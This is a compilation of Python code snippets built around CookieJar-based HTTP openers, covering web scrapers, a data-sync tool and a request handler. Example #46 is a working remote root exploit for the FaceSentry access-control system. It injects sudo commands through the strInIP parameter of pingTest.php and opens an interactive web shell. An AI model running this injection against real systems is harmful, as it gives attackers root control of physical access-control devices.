    #necessary for cookie setter websites like nyt
    if config[agency]['cookie']:
        soup = BeautifulSoup(opener.open(req), "lxml")
    else:
        soup = BeautifulSoup(urllib2.urlopen(req), "lxml")

    # for row in soup.find_all('section', attrs={"class": "zn-has-46-containers"}):
    #     print row.text

    #print soup
    # for item in soup.findAll("section", {}, True):
    #     if 'zn-has-46-containers' in item.attrs['class']:
    #         print item

    #mydivs = soup.findAll('section', {'class': lambda x: 'zn-has-46-containers' in x.split()})

    #print mydivs

    #print soup.find_all("section", class_="zn-has-46-containers")
    #print soup.find_all("section", class_="zn-has-46-containers", True)

    #print soup; exit()

    #print soup.find_all("div")
    #container = soup.find_all("div", class_="l-container")
    #container = soup.find_all(class_="zn-body__paragraph")
    #container = soup.find_all("div", class_="article-text")
    #container = soup.find_all(class_="story-body-text story-content")

    # print config[agency]["attr_key"]
    # name = "soup.find_all(" + "" + "='articleBody')"
    # container = eval(name)

    #print config[agency]

    #print soup; exit()

    html = ''
    title = soup.find_all('title')
    title = title[0].renderContents()
    #print title; exit()
    #title = html2text.html2text(str(title))

    if 'parent' in config[agency]:
        # BeautifulSoup filters on the HTML class attribute via the "class_"
        # keyword, so translate the config's "_class" key before searching
        parent_key = config[agency]['parent']['attr_key']
        parent_key = 'class_' if parent_key == '_class' else parent_key
        parent_attributes = {parent_key: config[agency]['parent']['attr_val']}
        parent = soup.find_all(**parent_attributes)
    else:
        parent = soup.find_all('html')

    #print parent; exit()

    # apply the same "_class" -> "class_" translation for the content selector
    attr_key = config[agency]['attr_key']
    attr_key = 'class_' if attr_key == '_class' else attr_key
    attributes = {attr_key: config[agency]['attr_val']}

    if 'tag' in config[agency]:
        attributes['name'] = config[agency]['tag']

    #print parent; exit()

    #print len(parent); exit()

    for par in parent:
        # collect the matching content elements using the agency-specific selector
        elements = par.find_all(**attributes)
        for e in elements:
            html += unicode(e.renderContents(), 'utf-8')

    h = html2text.HTML2Text()
    h.ignore_links = True
    article = h.handle(html)

    # article =  h.handle(html) \
    #     .replace('\n,\n', '').replace('\r,\r', '').replace('\n,', '').replace(',\n', '').replace('\\n', '') \
    #     .strip("[").strip("]")

    return title, article
Example #46
0
def main():
    if os.name == 'posix':
        os.system('clear')
    if os.name == 'nt':
        os.system('cls')

    vremetodeneska = datetime.datetime.now()
    kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')
    print 'Starting exploit at ' + kd

    print '''
──────────────────────────────────
──FaceSentry Access Control System
────────Remote Root Exploit
─────────Zero Science Lab
────────www.zeroscience.mk
───────────ZSL-2019-5525
─────────────▄▄▄▄▄▄▄▄▄
─────────────▌▐░▀░▀░▀▐
─────────────▌░▌░░░░░▐
─────────────▌░░░░░░░▐
─────────────▄▄▄▄▄▄▄▄▄
───────▄▀▀▀▀▀▌▄█▄░▄█▄▐▀▀▀▀▀▄
──────█▒▒▒▒▒▐░░░░▄░░░░▌▒▒▒▒▒█
─────▐▒▒▒▒▒▒▒▌░░░░░░░▐▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▒█░▀▀▀▀▀░█▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▒▒█▄▄▄▄▄█▒▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▌
─────▐▒▒▒▒▒█▒▒▒▒▒▒▒▒▒▒▒█▒▒▒▒▒▌
─────▐▒▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▌▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▌▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▌▄▄▄▄▄▄▄▄▄▐▒▒▒▒▒▒▌
─────▐▄▄▄▄▄▄▌▌███████▌▐▄▄▄▄▄▄▌
──────█▀▀▀▀█─▌███▌███▌─█▀▀▀▀█
──────▐░░░░▌─▌███▌███▌─▐░░░░▌
───────▀▀▀▀──▌███▌███▌──▀▀▀▀
─────────────▌███▌███▌
─────────────▌███▌███▌
───────────▐▀▀▀██▌█▀▀▀▌
▒▒▒▒▒▒▒▒▒▒▒▐▄▄▄▄▄▄▄▄▄▄▌▒▒▒▒▒▒▒▒▒▒▒
    '''

    usage()
    tegla = CookieJar()
    global ajde, target
    target = sys.argv[1]
    ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))
    auth()
    raw_input('\n[*] Press [ENTER] to land... ')

    print '[+] Entering interactive (web)shell...'
    time.sleep(1)
    print

    while True:
        try:
            cmd = raw_input('root@facesentry:~# ')
            if 'exit' in cmd.strip():
                print '[+] Take care now, bye bye then!'
                break
            if 'door' in cmd.strip():
                door()
                continue
            podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd
            nesto_encode = urllib.urlencode(podatoci)
            r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)
            pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read())
            x = pattern.groups()[0].strip()
            y = x.replace('<br>', '\n')
            print y.strip()
        except Exception as i:
            print '[-] Error: ' + i.message
            pass
        except KeyboardInterrupt as k:
            print '\n[+] Interrupted!'
            sys.exit()

    sys.exit()
Example #47
0
 def __init__(self):
     super(WebService, self).__init__()
     self._cookie = CookieJar()
     self._opener = urllib2.build_opener(
         urllib2.HTTPCookieProcessor(self._cookie))
     self.query_interval = 1.0
Example #48
0
 def __init__(self):
     cj = CookieJar()
     self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
     self.opener.addheaders = [('User-agent', 'Mozilla/5.0')]
Example #49
0
SITE = "https://www.reserveamerica.com"

HEADERS = {
  "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  "Accept-Encoding":"gzip, deflate, br",
  "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4,ru;q=0.2,es;q=0.2",
  "Connection":"keep-alive",
  "DNT":"1",
  "Host":"www.reserveamerica.com",
  "Referer":"https://www.reserveamerica.com/",
  "Upgrade-Insecure-Requests":"1",
  "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
}

cookie_jar = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
opener.addheaders = [(k, v) for k, v in HEADERS.items()]


class AvailableSite:
  def __init__(self, campsite_name, site_num, loop_name, date, book_url):
    self.campsite_name = campsite_name
    self.site_num = site_num
    self.loop_name = loop_name
    self.date = date
    self.book_url = book_url

  def __str__(self):
    formatter = '''
  Camping ground name: %s
Example #50
0
class GoogleWebMixin(object):

    cookiejar = CookieJar()
    user_agent = 'Lynx/2.8.8dev.3 libwww-FM/2.14 SSL-MM/1.4.1'

    def search_google_web(self, query, limit=0, start_page=1):
        # parsing logic based on https://github.com/maurosoria/s3arch
        url = 'https://www.google.com/search'
        num = 100
        page = start_page
        set_page = lambda x: (x - 1) * num
        payload = {
            'q': query,
            'start': set_page(page),
            'num': num,
            'complete': 0
        }
        results = []
        self.verbose('Searching Google for: %s' % (query))
        while True:
            #resp = None
            # google errors out at > 2061 characters not including the protocol
            # 21 (resource-proto) + 1 (?) + 8 (num) + 11 (complete) + 7 + len(start) + 3 + len(encoded(query))
            #max_len = 2061 - 21 - 1 - 8 - 11 - 7 - len(payload['start']) - 3
            #if len(urllib.quote_plus(query)) > max_len: query = query[:max_len]
            resp = self.request(url,
                                payload=payload,
                                redirect=False,
                                cookiejar=self.cookiejar,
                                agent=self.user_agent)
            # detect and handle captchas until answered correctly
            # first visit = 302, actual captcha = 503
            # follow the redirect to the captcha
            count = 0
            while resp.status_code == 302:
                redirect = resp.headers['location']
                # request the captcha page
                resp = self.request(redirect,
                                    redirect=False,
                                    cookiejar=self.cookiejar,
                                    agent=self.user_agent)
                count += 1
                # account for the possibility of infinite redirects
                if count == 20:
                    break
            # handle the captcha
            # check needed because the redirect could result in an error
            # will properly exit the loop and fall to the error check below
            if resp.status_code == 503:
                resp = self._solve_google_captcha(resp)
                continue
            # handle error conditions
            if resp.status_code != 200:
                self.error('Google encountered an unknown error.')
                break
            tree = fromstring(resp.text)
            links = tree.xpath('//a/@href')
            regmatch = re.compile('^/url\?q=[^/]')
            for link in links:
                if regmatch.match(
                        link
                ) != None and 'http://webcache.googleusercontent.com' not in link:
                    results.append(urllib.unquote_plus(link[7:link.find('&')]))
            # check limit
            if limit == page:
                break
            page += 1
            payload['start'] = set_page(page)
            # check for more pages
            if '>Next</' not in resp.text:
                break
        return results

    def _solve_google_captcha(self, resp):
        # set up the captcha page markup for parsing
        tree = fromstring(resp.text)
        # extract and request the captcha image
        resp = self.request('https://ipv4.google.com' +
                            tree.xpath('//img/@src')[0],
                            redirect=False,
                            cookiejar=self.cookiejar,
                            agent=self.user_agent)
        # store the captcha image to the file system
        with tempfile.NamedTemporaryFile(suffix='.jpg') as fp:
            fp.write(resp.raw)
            fp.flush()
            # open the captcha image for viewing in gui environments
            w = webbrowser.get()
            w.open('file://' + fp.name)
            self.alert(fp.name)
            _payload = {'captcha': raw_input('[CAPTCHA] Answer: ')}
            # temporary captcha file removed on close
        # extract the form elements for the captcha answer request
        form = tree.xpath('//form[@action="index"]')[0]
        for x in ['q', 'continue', 'submit']:
            _payload[x] = form.xpath('//input[@name="%s"]/@value' % (x))[0]
        # send the captcha answer
        return self.request('https://ipv4.google.com/sorry/CaptchaRedirect',
                            payload=_payload,
                            cookiejar=self.cookiejar,
                            agent=self.user_agent)
Example #51
0
def get(url,
        user_agent=None,
        verbose=False,
        max_retries=10,
        initial_delay_seconds=2,
        retry_delay_multiplier=2,
        ignore_404=True,
        ignore_410=True,
        ignore_500=True,
        ignore_400=True,
        ignore_403=True,
        timeout=10,
        allow_cookies=False,
        max_delay_seconds=30):
    """
    Retrieves the content of a URL, applying a customizable user-agent and
    intelligently waiting when network errors are encountered.
    """

    opener = None
    if allow_cookies:
        cj = CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

    _user_agent = user_agent
    for retry in xrange(max_retries):
        try:
            if _user_agent is None:
                user_agent = random.choice(USER_AGENTS)
            if verbose:
                print url

            if opener:
                opener.addheaders = [('User-agent', user_agent),
                                     ('Accept', '*/*')]
                response = opener.open(url, timeout=timeout)
            else:
                request = urllib2.Request(url=url,
                                          headers={
                                              'User-agent': user_agent,
                                              'Accept': '*/*'
                                          })
                response = urllib2.urlopen(request, timeout=timeout)

            break
        except urllib2.HTTPError, e:
            if ignore_400 and '400' in str(e):
                return
            if ignore_410 and '410' in str(e):
                return
            if ignore_403 and '403' in str(e):
                return
            if ignore_404 and '404' in str(e):
                return
            if ignore_500 and '500' in str(e):
                return
            if 'not found' in str(e).lower() and not ignore_404:
                raise
            if verbose:
                print 'scrapper.get.error: %s' % (e, )
            if retry == max_retries - 1:
                raise
            # Wait a short while, in case the error is due to a temporary
            # networking problem.
            time.sleep(
                min(max_delay_seconds,
                    initial_delay_seconds + retry * retry_delay_multiplier))
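With the defaults above, the wait before retry n (counting from 0) is min(max_delay_seconds, initial_delay_seconds + n * retry_delay_multiplier), i.e. 2, 4, 6, ... seconds capped at 30. A hedged call sketch (placeholder URL; the snippet is truncated here, so the success return value is not shown above):

# retries HTTPErrors that are not in the ignored set, sleeping 2, 4, 6, ...
# seconds (capped at max_delay_seconds) between attempts; ignored error
# codes (400/403/404/410/500 by default) simply return None
get('https://example.com/api/items',
    verbose=True,
    allow_cookies=True,   # route the request through a CookieJar-backed opener
    max_retries=5,
    timeout=15)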
Example #52
0
    import save
    
    save.state = 0
    
    save.nbposts = 0
    save.nbtopics = 0
    save.nbusers = 0
    
    save.forums = []
    save.topics = []
    save.users = []
    save.smileys = {}
    save.posts = []

logging.debug('Création de l\'urlopener')
cookiejar = CookieJar()
urlopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))

month = {u'Jan' : 1,
         u'Fév' : 2,
         u'Mar' : 3,
         u'Avr' : 4,
         u'Mai' : 5,
         u'Juin' : 6,
         u'Juil' : 7,
         u'Aoû' : 8,
         u'Sep' : 9,
         u'Oct' : 10,
         u'Nov' : 11,
         u'Déc' : 12}
Example #53
0
def main():

    try:
        ssl._create_default_https_context = ssl._create_unverified_context

        opener = wdf_urllib.build_opener(
            wdf_urllib.HTTPCookieProcessor(CookieJar()))
        opener.addheaders = [(
            'User-agent',
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36'
        )]
        wdf_urllib.install_opener(opener)
    except:
        pass

    if not getUUID():
        print('获取uuid失败')
        return

    print('正在获取二维码图片...')
    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
        pass

    os.remove(QRImagePath)

    if not login():
        print('登录失败')
        return

    if not webwxinit():
        print('初始化失败')
        return

    MemberList = webwxgetcontact()

    print('开启心跳线程')
    thread.start_new_thread(heartBeatLoop, ())

    MemberCount = len(MemberList)
    print('通讯录共%s位好友' % MemberCount)

    ChatRoomName = ''
    result = []
    d = {}
    for Member in MemberList:
        d[Member['UserName']] = (Member['NickName'].encode('utf-8'),
                                 Member['RemarkName'].encode('utf-8'))
    print('开始查找...')
    group_num = int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))
    for i in range(0, group_num):
        UserNames = []
        for j in range(0, MAX_GROUP_NUM):
            if i * MAX_GROUP_NUM + j >= MemberCount:
                break
            Member = MemberList[i * MAX_GROUP_NUM + j]
            UserNames.append(Member['UserName'])

        # create a new chat room or add members to the existing one
        if ChatRoomName == '':
            (ChatRoomName, DeletedList,
             BlockedList) = createChatroom(UserNames)
        else:
            (DeletedList, BlockedList) = addMember(ChatRoomName, UserNames)

        # todo: BlockedList -- contacts that have blocked you

        DeletedCount = len(DeletedList)
        if DeletedCount > 0:
            result += DeletedList

        # remove the members from the chat room
        deleteMember(ChatRoomName, UserNames)

        # progress bar
        progress = MAX_PROGRESS_LEN * (i + 1) / group_num
        print('[',
              '#' * progress,
              '-' * (MAX_PROGRESS_LEN - progress),
              ']',
              end=' ')
        print('新发现你被%d人删除' % DeletedCount)
        # use a separate index so the outer group counter `i` is not clobbered
        for k in range(DeletedCount):
            if d[DeletedList[k]][1] != '':
                print(d[DeletedList[k]][0] + '(%s)' % d[DeletedList[k]][1])
            else:
                print(d[DeletedList[k]][0])

        if i != group_num - 1:
            print('正在继续查找,请耐心等待...')
            # wait before making the next API call
            time.sleep(INTERFACE_CALLING_INTERVAL)
    # todo: delete the chat room

    print('\n结果汇总完毕,20s后可重试...')
    resultNames = []
    for r in result:
        if d[r][1] != '':
            resultNames.append(d[r][0] + '(%s)' % d[r][1])
        else:
            resultNames.append(d[r][0])

    print('---------- 被删除的好友列表(共%d人) ----------' % len(result))
    # filter out emoji markup
    resultNames = map(lambda x: re.sub(r'<span.+/span>', '', x), resultNames)
    if len(resultNames):
        print('\n'.join(resultNames))
    else:
        print("无")
    print('---------------------------------------------')
Example #54
0
#!/usr/bin/env python
# coding: utf-8

import urllib2, urllib
from cookielib import CookieJar

EMAIL = '*****@*****.**'
PASSWD = 'pass'

# cookie support
urllib2.install_opener(
    urllib2.build_opener(urllib2.HTTPCookieProcessor(CookieJar())))

# login
headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'
}
data = urllib.urlencode({'email': EMAIL, 'password': PASSWD, 'submit': '登 录'})
r = urllib2.Request('http://www.xiami.com/member/login',
                    data=data,
                    headers=headers)
urllib2.urlopen(r).read()

# checkin
headers['X-Requested-With'] = 'XMLHttpRequest'
headers['Referer'] = 'http://www.xiami.com/'
r = urllib2.Request('http://www.xiami.com/task/signin',
                    data='',
                    headers=headers)
print urllib2.urlopen(r).read()
Example #55
0
def nsidc_icesat2_sync(ddir,
                       PRODUCTS,
                       VERSION,
                       GRANULES,
                       USER='',
                       PASSWORD='',
                       YEARS=None,
                       SUBDIRECTORY=None,
                       LOG=False,
                       LIST=False,
                       MODE=None,
                       CLOBBER=False):

    #-- output of synchronized files
    if LOG:
        #-- output to log file
        LOGDIR = os.path.join(ddir, 'icesat2.dir', 'sync_logs.dir')
        #-- check if log directory exists and recursively create if not
        os.makedirs(LOGDIR, MODE) if not os.path.exists(LOGDIR) else None
        #-- format: NSIDC_IceSat-2_sync_2002-04-01.log
        today = time.strftime('%Y-%m-%d', time.localtime())
        LOGFILE = 'NSIDC_IceSat-2_sync_{0}.log'.format(today)
        fid = open(os.path.join(LOGDIR, LOGFILE), 'w')
        print('NSIDC IceSat-2 Sync Log ({0})'.format(today), file=fid)
    else:
        #-- standard output (terminal output)
        fid = sys.stdout

    #-- https://docs.python.org/3/howto/urllib2.html#id5
    #-- create a password manager
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    #-- Add the username and password for NASA Earthdata Login system
    password_mgr.add_password(None, 'https://urs.earthdata.nasa.gov', USER,
                              PASSWORD)
    #-- Encode username/password for request authorization headers
    base64_string = base64.b64encode('{0}:{1}'.format(USER, PASSWORD).encode())
    #-- compile HTML parser for lxml
    parser = lxml.etree.HTMLParser()
    #-- Create cookie jar for storing cookies. This is used to store and return
    #-- the session cookie given to us by the data server (otherwise will just
    #-- keep sending us back to Earthdata Login to authenticate).
    cookie_jar = CookieJar()
    #-- create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(
        urllib2.HTTPBasicAuthHandler(password_mgr),
        #urllib2.HTTPHandler(debuglevel=1),  # Uncomment these two lines to see
        #urllib2.HTTPSHandler(debuglevel=1), # details of the requests/responses
        urllib2.HTTPCookieProcessor(cookie_jar))
    #-- add Authorization header to opener
    authorization_header = "Basic {0}".format(base64_string.decode())
    opener.addheaders = [("Authorization", authorization_header)]
    #-- Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)
    #-- All calls to urllib2.urlopen will now use handler
    #-- Make sure not to include the protocol in with the URL, or
    #-- HTTPPasswordMgrWithDefaultRealm will be confused.

    #-- remote https server for ICESat-2 Data
    HOST = 'https://n5eil01u.ecs.nsidc.org'
    #-- regular expression operator for finding files of a particular granule
    remote_regex_pattern = '{0}_(\d+)_03140110_(\d+)_{1:02d}.(.*?)'
    #-- regular expression operator for finding subdirectories
    if SUBDIRECTORY:
        #-- Sync particular subdirectories for product
        R2 = re.compile('(' + '|'.join(SUBDIRECTORY) + ')', re.VERBOSE)
    elif YEARS:
        #-- Sync particular years for product
        regex_pattern = '|'.join('{0:d}'.format(y) for y in YEARS)
        R2 = re.compile('({0}).(\d+).(\d+)'.format(regex_pattern), re.VERBOSE)
    else:
        #-- Sync all available years for product
        R2 = re.compile('(\d+).(\d+).(\d+)', re.VERBOSE)

    #-- for each icesat2 product listed
    for p in PRODUCTS:
        print('PRODUCT={0}'.format(p), file=fid) if LOG else None
        #-- input directory for product
        DIRECTORY = os.path.join(ddir, '{0}.{1:03d}'.format(p, VERSION))
        #-- get directories from remote directory
        remote_directories = ['ATLAS', '{0}.{1:03d}'.format(p, VERSION)]
        d = posixpath.join(HOST, *remote_directories)
        req = urllib2.Request(url=d)
        #-- read and parse request for subdirectories (find column names)
        tree = lxml.etree.parse(urllib2.urlopen(req), parser)
        colnames = tree.xpath('//td[@class="indexcolname"]//a/@href')
        remote_sub = [sd for sd in colnames if R2.match(sd)]
        #-- for each remote subdirectory
        for sd in remote_sub:
            #-- check if data directory exists and recursively create if not
            local_dir = os.path.join(DIRECTORY, sd)
            os.makedirs(local_dir,
                        MODE) if not os.path.exists(local_dir) else None
            #-- find ICESat-2 data files
            req = urllib2.Request(url=posixpath.join(d, sd))
            #-- read and parse request for remote files (columns and dates)
            tree = lxml.etree.parse(urllib2.urlopen(req), parser)
            colnames = tree.xpath('//td[@class="indexcolname"]//a/@href')
            collastmod = tree.xpath('//td[@class="indexcollastmod"]/text()')
            remote_file_lines = [
                i for i, f in enumerate(colnames)
                if re.match(remote_regex_pattern, f)
            ]
            #-- sync each ICESat-2 data file
            for i in remote_file_lines:
                #-- remote and local versions of the file
                remote_file = posixpath.join(d, sd, colnames[i])
                local_file = os.path.join(local_dir, colnames[i])
                #-- get last modified date and convert into unix time
                LMD = time.strptime(collastmod[i].rstrip(), '%Y-%m-%d %H:%M')
                remote_mtime = calendar.timegm(LMD)
                #-- sync ICESat-2 files with NSIDC server
                http_pull_file(fid, remote_file, remote_mtime, local_file,
                               LIST, CLOBBER, MODE)
        #-- close request
        req = None

    #-- close log file and set permissions level to MODE
    if LOG:
        fid.close()
        os.chmod(os.path.join(LOGDIR, LOGFILE), MODE)
Example #56
0
class _RequestsHandler(object):
    def __init__(self,
                 cache_dir=None,
                 web_time_out=30,
                 cookie_jar=None,
                 ignore_ssl_errors=False):
        """ Initialises the UriHandler class

        Keyword Arguments:
        :param str cache_dir:         A path for http caching. If specified, caching will be used.
        :param int web_time_out:      Timeout for requests in seconds
        :param str cookie_jar:        The path to the cookie jar (in case of file storage)
        :param ignore_ssl_errors:     Ignore any SSL certificate errors.

        """

        self.id = int(time.time())

        if cookie_jar:
            self.cookieJar = MozillaCookieJar(cookie_jar)
            if not os.path.isfile(cookie_jar):
                self.cookieJar.save()
            self.cookieJar.load()
            self.cookieJarFile = True
        else:
            self.cookieJar = CookieJar()
            self.cookieJarFile = False

        self.cacheDir = cache_dir
        self.cacheStore = None
        if cache_dir:
            self.cacheStore = StreamCache(cache_dir)
            Logger.debug("Opened %s", self.cacheStore)
        else:
            Logger.debug("No cache-store provided. Cached disabled.")

        self.userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"
        self.webTimeOut = web_time_out  # max duration of request
        self.ignoreSslErrors = ignore_ssl_errors  # ignore SSL errors
        if self.ignoreSslErrors:
            Logger.warning("Ignoring all SSL errors in Python")

        # status of the most recent call
        self.status = UriStatus(code=0, url=None, error=False, reason=None)

        # for download animation
        self.__animationIndex = -1

    def download(self,
                 uri,
                 filename,
                 folder,
                 progress_callback=None,
                 proxy=None,
                 params="",
                 data="",
                 json="",
                 referer=None,
                 additional_headers=None):
        """ Downloads a remote file

        :param str filename:                The filename that should be used to store the file.
        :param str folder:                  The folder to save the file in.
        :param str params:                  Data to send with the request (open(uri, params)).
        :param str uri:                     The URI to download.
        :param dict[str, any]|str data:     Data to send with the request (open(uri, data)).
        :param dict[str, any] json:              Json to send with the request (open(uri, json)).
        :param ProxyInfo proxy:             The address and port (proxy.address.ext:port) of a
                                            proxy server that should be used.
        :param str referer:                 The http referer to use.
        :param dict additional_headers:     The optional headers.
        :param function progress_callback:  The callback for progress update. The format is
                                            function(retrievedSize, totalSize, perc, completed, status)

        :return: The full path of the location to which it was downloaded.
        :rtype: str

        """

        if not folder or not filename:
            raise ValueError(
                "Destination folder and filename should be specified")
        if not os.path.isdir(folder):
            raise ValueError("Destination folder is not a valid location")
        if not progress_callback:
            raise ValueError("A callback must be specified")

        download_path = os.path.join(folder, filename)
        if os.path.isfile(download_path):
            Logger.info("Url already downloaded to: %s", download_path)
            return download_path

        Logger.info("Creating Downloader for url '%s' to filename '%s'", uri,
                    download_path)
        r = self.__requests(uri,
                            proxy=proxy,
                            params=params,
                            data=data,
                            json=json,
                            referer=referer,
                            additional_headers=additional_headers,
                            no_cache=True,
                            stream=True)
        if r is None:
            return ""

        retrieved_bytes = 0
        total_size = int(r.headers.get('Content-Length', '0').strip())
        # There is an issue with the way Requests checks its input: it does not like the newint type.
        if PY2:
            chunk_size = 10 * 1024
        else:
            chunk_size = 1024 if total_size == 0 else total_size // 100
        cancel = False
        with open(download_path, 'wb') as fd:
            for chunk in r.iter_content(chunk_size=chunk_size):
                fd.write(chunk)
                retrieved_bytes += len(chunk)

                if progress_callback:
                    cancel = self.__do_progress_callback(
                        progress_callback, retrieved_bytes, total_size, False)
                if cancel:
                    Logger.warning("Download of %s aborted", uri)
                    break

        if cancel:
            if os.path.isfile(download_path):
                Logger.info("Removing partial download: %s", download_path)
                os.remove(download_path)
            return ""

        if progress_callback:
            self.__do_progress_callback(progress_callback, retrieved_bytes,
                                        total_size, True)
        return download_path

    def open(self,
             uri,
             proxy=None,
             params=None,
             data=None,
             json=None,
             referer=None,
             additional_headers=None,
             no_cache=False):
        """ Open an URL Async using a thread

        :param str uri:                         The URI to download.
        :param str params:                      Data to send with the request (open(uri, params)).
        :param dict[str, any]|str|bytes data:   Data to send with the request (open(uri, data)).
        :param dict[str, any] json:             Json to send with the request (open(uri, json)).
        :param ProxyInfo proxy:                 The address and port (proxy.address.ext:port) of a
                                                proxy server that should be used.
        :param str referer:                     The http referer to use.
        :param dict|None additional_headers:    The optional headers.
        :param bool no_cache:                   Should cache be disabled.

        :return: The data that was retrieved from the URI.
        :rtype: str|unicode

        """
        r = self.__requests(uri,
                            proxy=proxy,
                            params=params,
                            data=data,
                            json=json,
                            referer=referer,
                            additional_headers=additional_headers,
                            no_cache=no_cache,
                            stream=False)
        if r is None:
            return ""

        content_type = r.headers.get("content-type", "")
        if r.encoding == 'ISO-8859-1' and "text" in content_type:
            # Requests defaults to ISO-8859-1 for all text content that does not specify an encoding
            Logger.debug(
                "Found 'ISO-8859-1' for 'text' content-type. Using UTF-8 instead."
            )
            r.encoding = 'utf-8'

        # We might need a better mechanism here.
        if not r.encoding and content_type.lower() in [
                "application/json", "application/javascript"
        ]:
            return r.text

        return r.text if r.encoding else r.content

    def header(self, uri, proxy=None, referer=None, additional_headers=None):
        """ Retrieves header information only.

        :param str uri:                         The URI to fetch the header from.
        :param ProxyInfo|none proxy:            The address and port (proxy.address.ext:port) of a
                                                proxy server that should be used.
        :param str|none referer:                The http referer to use.
        :param dict|none additional_headers:    The optional headers.

        :return: Content-type and the URL to which a redirect could have occurred.
        :rtype: tuple[str,str]

        """

        with requests.session() as s:
            s.cookies = self.cookieJar
            s.verify = not self.ignoreSslErrors

            proxies = self.__get_proxies(proxy, uri)
            headers = self.__get_headers(referer, additional_headers)

            Logger.info("Performing a HEAD for %s", uri)
            r = s.head(uri,
                       proxies=proxies,
                       headers=headers,
                       allow_redirects=True,
                       timeout=self.webTimeOut)

            content_type = r.headers.get("Content-Type", "")
            real_url = r.url

            self.status = UriStatus(code=r.status_code,
                                    url=uri,
                                    error=not r.ok,
                                    reason=r.reason)
            if self.cookieJarFile:
                # noinspection PyUnresolvedReferences
                self.cookieJar.save()

            if r.ok:
                Logger.info("%s resulted in '%s %s' (%s) for %s",
                            r.request.method, r.status_code, r.reason,
                            r.elapsed, r.url)
                return content_type, real_url
            else:
                Logger.error("%s failed with in '%s %s' (%s) for %s",
                             r.request.method, r.status_code, r.reason,
                             r.elapsed, r.url)
                return "", ""

    # noinspection PyUnusedLocal
    def __requests(self, uri, proxy, params, data, json, referer,
                   additional_headers, no_cache, stream):

        with requests.session() as s:
            s.cookies = self.cookieJar
            s.verify = not self.ignoreSslErrors
            if self.cacheStore and not no_cache:
                Logger.trace("Adding the %s to the request", self.cacheStore)
                s.mount("https://", CacheHTTPAdapter(self.cacheStore))
                s.mount("http://", CacheHTTPAdapter(self.cacheStore))

            proxies = self.__get_proxies(proxy, uri)
            if proxies is not None and "dns" in proxies:
                s.mount(
                    "https://",
                    DnsResolverHTTPAdapter(uri,
                                           proxies["dns"],
                                           logger=Logger.instance()))

            headers = self.__get_headers(referer, additional_headers)

            if params is not None:
                # Old UriHandler behaviour. Set form header to keep compatible
                if "content-type" not in headers:
                    headers[
                        "content-type"] = "application/x-www-form-urlencoded"

                Logger.info("Performing a POST with '%s' for %s",
                            headers["content-type"], uri)
                r = s.post(uri,
                           data=params,
                           proxies=proxies,
                           headers=headers,
                           stream=stream,
                           timeout=self.webTimeOut)
            elif data is not None:
                # Normal Requests compatible data object
                Logger.info("Performing a POST with '%s' for %s",
                            headers.get("content-type", "<No Content-Type>"),
                            uri)
                r = s.post(uri,
                           data=data,
                           proxies=proxies,
                           headers=headers,
                           stream=stream,
                           timeout=self.webTimeOut)
            elif json is not None:
                Logger.info("Performing a json POST with '%s' for %s",
                            headers.get("content-type", "<No Content-Type>"),
                            uri)
                r = s.post(uri,
                           json=json,
                           proxies=proxies,
                           headers=headers,
                           stream=stream,
                           timeout=self.webTimeOut)
            else:
                Logger.info("Performing a GET for %s", uri)
                r = s.get(uri,
                          proxies=proxies,
                          headers=headers,
                          stream=stream,
                          timeout=self.webTimeOut)

            if r.ok:
                Logger.info("%s resulted in '%s %s' (%s) for %s",
                            r.request.method, r.status_code, r.reason,
                            r.elapsed, r.url)
            else:
                Logger.error("%s failed with '%s %s' (%s) for %s",
                             r.request.method, r.status_code, r.reason,
                             r.elapsed, r.url)

            self.status = UriStatus(code=r.status_code,
                                    url=r.url,
                                    error=not r.ok,
                                    reason=r.reason)
            if self.cookieJarFile:
                # noinspection PyUnresolvedReferences
                self.cookieJar.save()
            return r

    def __get_headers(self, referer, additional_headers):
        headers = {}
        if additional_headers:
            for k, v in additional_headers.items():
                headers[k.lower()] = v

        if "user-agent" not in headers:
            headers["user-agent"] = self.userAgent
        if referer and "referer" not in headers:
            headers["referer"] = referer

        return headers

    def __get_proxies(self, proxy, url):
        """

        :param ProxyInfo proxy:
        :param url:

        :return:
        :rtype: dict[str, str]

        """

        if proxy is None:
            return None

        elif not proxy.use_proxy_for_url(url):
            Logger.debug("Not using proxy due to filter mismatch")

        elif proxy.Scheme == "http":
            Logger.debug("Using a http(s) %s", proxy)
            proxy_address = proxy.get_proxy_address()
            return {"http": proxy_address, "https": proxy_address}

        elif proxy.Scheme == "dns":
            Logger.debug("Using a DNS %s", proxy)
